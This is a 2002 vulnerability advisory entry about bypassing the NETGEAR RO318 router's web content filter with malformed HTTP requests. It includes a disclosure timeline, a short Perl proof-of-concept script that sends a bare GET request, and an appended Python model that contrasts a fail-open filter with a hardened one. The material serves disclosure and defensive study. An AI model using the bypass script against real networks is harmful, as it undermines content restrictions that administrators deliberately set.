NETGEAR Router Web Content Filtering Mechanism Can Be Bypassed By Remote Users With Certain Malformed HTTP GET Requests

Date: Jan 31 2002
Impact: Host/resource access via network
Exploit Included: Yes
Version(s): RO318

Description: A vulnerability was reported in NETGEAR's RO318 Cable/DSL Security Router. A remote user can bypass the web content filtering restrictions.
It is reported that a remote user can send a malformed URL request through the router to access restricted web site URLs. The web filtering component in firmware reportedly only checks for fully constructed requests.

Impact: A remote user can access restricted web content.
Solution: No solution was available at the time of this entry.
Vendor URL: www.netgear.com/product_view.asp?xrp=4&yrp=12&zrp=96
Cause: Input validation error
Reported By: nbs@tampabay.rr.com
Message History: None.

Source Message Contents

Date: Thu, 31 Jan 2002 03:23:13 -0500
From: nbs@tampabay.rr.com
Subject: NetGear RO318 HTTP Filter Advisory
http://home.tampabay.rr.com/nbs/advisories/netgear/netgear.txt
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory =+
=+ Null Byte Security =+
=+ http://home.tampabay.rr.com/nbs/ =+
=+ don't call it a come back =+
=+ nbs@tampabay.rr.com =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table =+
=+ =+
=+ 1.About =+
=+ 2.Affected =+
=+ 3.Details =+
=+ 4.Contact =+
=+ 5.Conclusion =+
=+ 6.Thanks =+
=+ 7.Greets =+
=+ 8.POC =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About =+
=+ =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+
=+ fully protects your small office network against intrusion. Equipped with =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+
=+ Network Address Translation (NAT) to maintain network security against =+
=+ hackers, it ensures prolonged up time and maximized productivity for your =+
=+ network. Web content filtering options let network administrators establish =+
=+ restricted access policies - based on the time of day, day of week, Web =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet =+
=+ access with up to 253 users, in less than an hour. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected =+
=+ =+
=+ NetGear RO318 Cable/DSL Security Router =+
=+ =+
=+ Although the NetGear RO318 is the only router listed here we are sure there =+
=+ are other routers that use the RO318's web filtering technology. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details =+
=+ =+
=+ We are not too sure of the details ourselves because of time restraints, but =+
=+ we do have an idea. One, the web filtering component in the firmware only =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat, =+
=+ request results in the retrieval of restricted content. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact =+
=+ =+
=+ December 2 2001: Contacted NetGear =+
=+ December 2 2001: Contacted online support =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+
=+ December 8 2001: Five working days passed =+
=+ December 20 2001: Eighteen days passed =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+
=+ December 26 2001: POC released =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion =+
=+ =+
=+ This is definitely a security vulnerability and not a feature. We hope Net =+
=+ Gear will fix this with their next firmware release so administrators can =+
=+ restrict necessary web-content without having to worry about this bug. =+
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks =+
=+ =+
=+ Bi0cide for the help =+
=+ Datagram for the help =+
=+ Natas for the help =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets =+
=+ =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC =+
=+ =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com
use IO::Socket;
use Getopt::Std;
getopts('h:p:z', \%argv);
# A host is required; print usage and stop without one
if(!defined($argv{h}))
{
print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n";
print"Usage: $0 -h <host> -p <port> \n";
exit;
}
if(defined($argv{h}))
{
&begin;
}
sub begin
{
# Name of the file the response is appended to
$html = "html";
$host = $argv{h};
if(defined $argv{p})
{
$port=$argv{p};
}
else
{
$port = "80";
}
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $host,
PeerPort => "$port")
or die "Connection Refused.\n";
# Bare HTTP/1.0 request: request line only, no headers
print $socket "GET / HTTP/1.0\n\n";
# Open the output file once and append each line of the response
open(LOG, ">>$html") or die "Cannot open $html: $!\n";
while (<$socket>)
{
print LOG $_;
}
close LOG;
close $socket;
}
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
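
A minimal model of the failure described in section 3 and in the SecurityTracker description, added here as an illustration; it is not code from the advisory or from NETGEAR firmware. It assumes the filter keys on the Host header (the advisory does not confirm the mechanism); `dest_name`, the keyword and the sample requests are constructed.

```python
# Added illustration: toy model of a gateway keyword filter (constructed data).
BLOCKED_KEYWORDS = ("casino",)  # constructed policy keyword
FULL = b"GET / HTTP/1.1\r\nHost: www.casino.example\r\n\r\n"  # constructed
BARE = b"GET / HTTP/1.0\n\n"  # same request shape as the POC above

def parse_request(raw):
    """Return (target, headers) parsed from a raw HTTP request head."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    lines = head.decode("latin-1").split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("bad request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[1], headers

def is_blocked(text):
    return any(k in text.lower() for k in BLOCKED_KEYWORDS)

def naive_filter(raw, dest_name):
    """Fail-open: only 'fully constructed' requests are checked.
    dest_name is ignored, which is the assumed weakness."""
    try:
        target, headers = parse_request(raw)
    except ValueError:
        return "ALLOW"
    host = headers.get("host")
    if host is None:
        return "ALLOW"  # no Host header, so the keyword check never runs
    return "BLOCK" if is_blocked(host + target) else "ALLOW"

def hardened_filter(raw, dest_name):
    """Fail-closed: unparseable input is rejected, and the name the gateway
    itself associates with the destination (assumed available, e.g. from
    its DNS relay) is always checked alongside Host and the target."""
    try:
        target, headers = parse_request(raw)
    except ValueError:
        return "BLOCK"
    names = (headers.get("host", ""), target, dest_name)
    return "BLOCK" if any(is_blocked(n) for n in names) else "ALLOW"
```

The hardened variant does not depend on what the client chooses to put in the request: the decision is anchored to the destination the gateway observed, and anything it cannot parse is refused.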